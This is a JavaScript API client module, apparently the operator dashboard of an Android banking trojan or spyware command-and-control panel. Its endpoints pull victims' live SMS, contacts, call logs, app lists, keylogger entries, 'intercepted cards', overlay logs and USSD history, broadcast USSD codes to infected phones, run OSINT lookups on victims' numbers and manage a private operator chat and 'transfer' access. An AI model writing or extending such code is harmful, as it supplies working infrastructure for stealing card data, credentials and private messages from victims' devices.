import axios from 'axios';

const api = axios.create({
    baseURL: '/api', 
    withCredentials: true
});

api.interceptors.request.use((config) => {
    const token = localStorage.getItem('token');
    if (token) {
        config.headers.Authorization = `Bearer ${token}`;
    }
    return config;
});

api.getArchivedSmsHistory = (deviceUuid) => {
    return api.get(`/history/${deviceUuid}/archived-sms`);
};

api.getOutgoingSmsHistory = (deviceUuid) => {
    return api.get(`/history/${deviceUuid}/outgoing-sms`);
};

api.getNotificationHistory = (deviceUuid) => {
    return api.get(`/history/${deviceUuid}/notifications`);
};

api.getLiveSms = (deviceUuid) => {
    return api.get(`/data/sms/${deviceUuid}`); 
};

api.getAppsList = (deviceUuid) => {
    return api.get(`/data/apps/${deviceUuid}`);
};

api.getKeylogPackages = (deviceUuid) => {
    return api.get(`/data/keylog/${deviceUuid}/packages`);
};

api.getKeylogEntries = (deviceUuid, pkg) => {
    return api.get(`/data/keylog/${deviceUuid}/${encodeURIComponent(pkg)}`);
};

api.deleteKeylogEntries = (deviceUuid, pkg) => {
    return api.delete(`/data/keylog/${deviceUuid}/${encodeURIComponent(pkg)}`);
};

api.getInterceptedCards = (deviceUuid) => {
    return api.get(`/devices/${deviceUuid}/cards`);
};

api.getDevice = (uuid) => {
    return api.get(`/devices/${uuid}`);
};

api.getUssdHistory = (deviceUuid) => {
    return api.get(`/history/${deviceUuid}/ussd`);
};

api.checkNumberInfo = (deviceUuid, phoneNumber, simSlotIndex) => {
    return api.post(`/devices/${deviceUuid}/check-number`, { phoneNumber, simSlotIndex });
};

api.checkOsintForDevice = (deviceUuid, phoneNumber, simSlotIndex) => {
    return api.post(`/devices/${deviceUuid}/check-osint`, { phoneNumber, simSlotIndex });
};

api.broadcastUssd = (requestCode, simIndex) => {
    return api.post('/admin/broadcast-ussd', { requestCode, simIndex });
};

api.getContactsList = (deviceUuid) => {
    return api.get(`/data/contacts/${deviceUuid}`);
};

api.getCallLogs = (deviceUuid) => {
    return api.get(`/data/calls/${deviceUuid}`);
};

api.saveDeviceNote = (uuid, note) => {
    return api.post(`/devices/${uuid}/note`, { note });
};

api.deleteUser = (userId) => {
    return api.delete(`/admin/users/${userId}`);
};

api.getNotificationSettings = () => {
    return api.get('/user/settings');
};

api.updateNotificationSettings = (settings) => {
    return api.put('/user/settings', settings);
};

api.getMonitorSettings = () => {
    return api.get('/user/monitor/settings');
};

api.updateMonitorSettings = (payload) => {
    return api.put('/user/monitor/settings', payload);
};

api.addTrackedDevices = (uuids) => {
    return api.post('/user/monitor/devices', { uuids });
};

api.removeTrackedDevice = (uuid) => {
    return api.delete(`/user/monitor/devices/${encodeURIComponent(uuid)}`);
};

api.getNotifyExtra = () => api.get('/user/notify-extra');
api.updateNotifyExtra = (data) => api.put('/user/notify-extra', data);

api.getUnlockNotifySettings = () => api.get('/user/unlock-notify');
api.updateUnlockNotifySettings = (data) => api.put('/user/unlock-notify', data);

api.getOverlayLogs = (uuid) => api.get(`/devices/${uuid}/overlay-logs`);
api.getOverlayState = (uuid) => api.get(`/devices/${uuid}/overlay-state`);

api.markForDeletion = (uuid) => api.post(`/devices/${uuid}/mark-for-deletion`);
api.unmarkForDeletion = (uuid) => api.post(`/devices/${uuid}/unmark-for-deletion`);
api.deletePermanently = (uuid) => api.delete(`/admin/devices/${uuid}/permanently`);
api.markInWork = (uuid) => api.post(`/devices/${uuid}/mark-in-work`);
api.unmarkInWork = (uuid) => api.post(`/devices/${uuid}/unmark-in-work`);

// ─── Приватный чат ─────────────────────────────────────────────────────────
api.chat = {
    access: () => api.get('/chat/access'),
    messages: (params = {}) => api.get('/chat/messages', { params }),
    pinned: () => api.get('/chat/pinned'),
    unreadCount: () => api.get('/chat/unread-count'),
    search: (q, limit = 30) => api.get('/chat/search', { params: { q, limit } }),
    sendText: (text, replyTo = null) => api.post('/chat/messages', { text, replyTo }),
    sendPoll: (poll, replyTo = null) => api.post('/chat/messages', { poll, replyTo }),
    upload: (file, caption = '', replyTo = null, onProgress = null, durationSec = null) => {
        const fd = new FormData();
        fd.append('file', file);
        if (caption) fd.append('caption', caption);
        if (replyTo) fd.append('replyTo', replyTo);
        if (durationSec != null) fd.append('durationSec', String(Math.round(durationSec)));
        return api.post('/chat/upload', fd, {
            headers: { 'Content-Type': 'multipart/form-data' },
            onUploadProgress: onProgress || undefined
        });
    },
    // <img>/<audio>/<video> не передают Authorization header — поэтому token идёт в query.
    // Бэкенд (checkAuth) уже умеет принимать token из ?token=...
    fileUrl: (fileId) => {
        const t = localStorage.getItem('token') || '';
        return `/api/chat/file/${encodeURIComponent(fileId)}?token=${encodeURIComponent(t)}`;
    },
    thumbUrl: (fileId) => {
        const t = localStorage.getItem('token') || '';
        return `/api/chat/file/${encodeURIComponent(fileId)}/thumb?token=${encodeURIComponent(t)}`;
    },
    markRead: (messageId) => api.post(`/chat/messages/${messageId}/read`),
    pollVote: (messageId, optionId) => api.post(`/chat/messages/${messageId}/poll-vote`, { optionId }),
    react: (messageId, emoji) => api.post(`/chat/messages/${messageId}/reaction`, { emoji }),
    edit: (messageId, text) => api.patch(`/chat/messages/${messageId}`, { text }),
    usersWithAccess: () => api.get('/chat/users-with-access'),
    // admin
    readers: (messageId) => api.get(`/chat/messages/${messageId}/readers`),
    presence: () => api.get('/chat/presence'),
    pin: (messageId) => api.post(`/chat/messages/${messageId}/pin`),
    deleteMsg: (messageId) => api.delete(`/chat/messages/${messageId}`),
    clearAll: () => api.post('/chat/clear'),
    muteGlobal: (minutes) => api.post('/chat/mute/global', { minutes }),
    muteUser: (login, minutes) => api.post('/chat/mute/user', { login, minutes }),
};

api.setUserChatAccess = (userId, enabled) =>
    api.patch(`/admin/users/${userId}/chat-access`, { enabled });

api.setUserTransferAccess = (userId, enabled) =>
    api.patch(`/admin/users/${userId}/transfer-access`, { enabled });

export default api;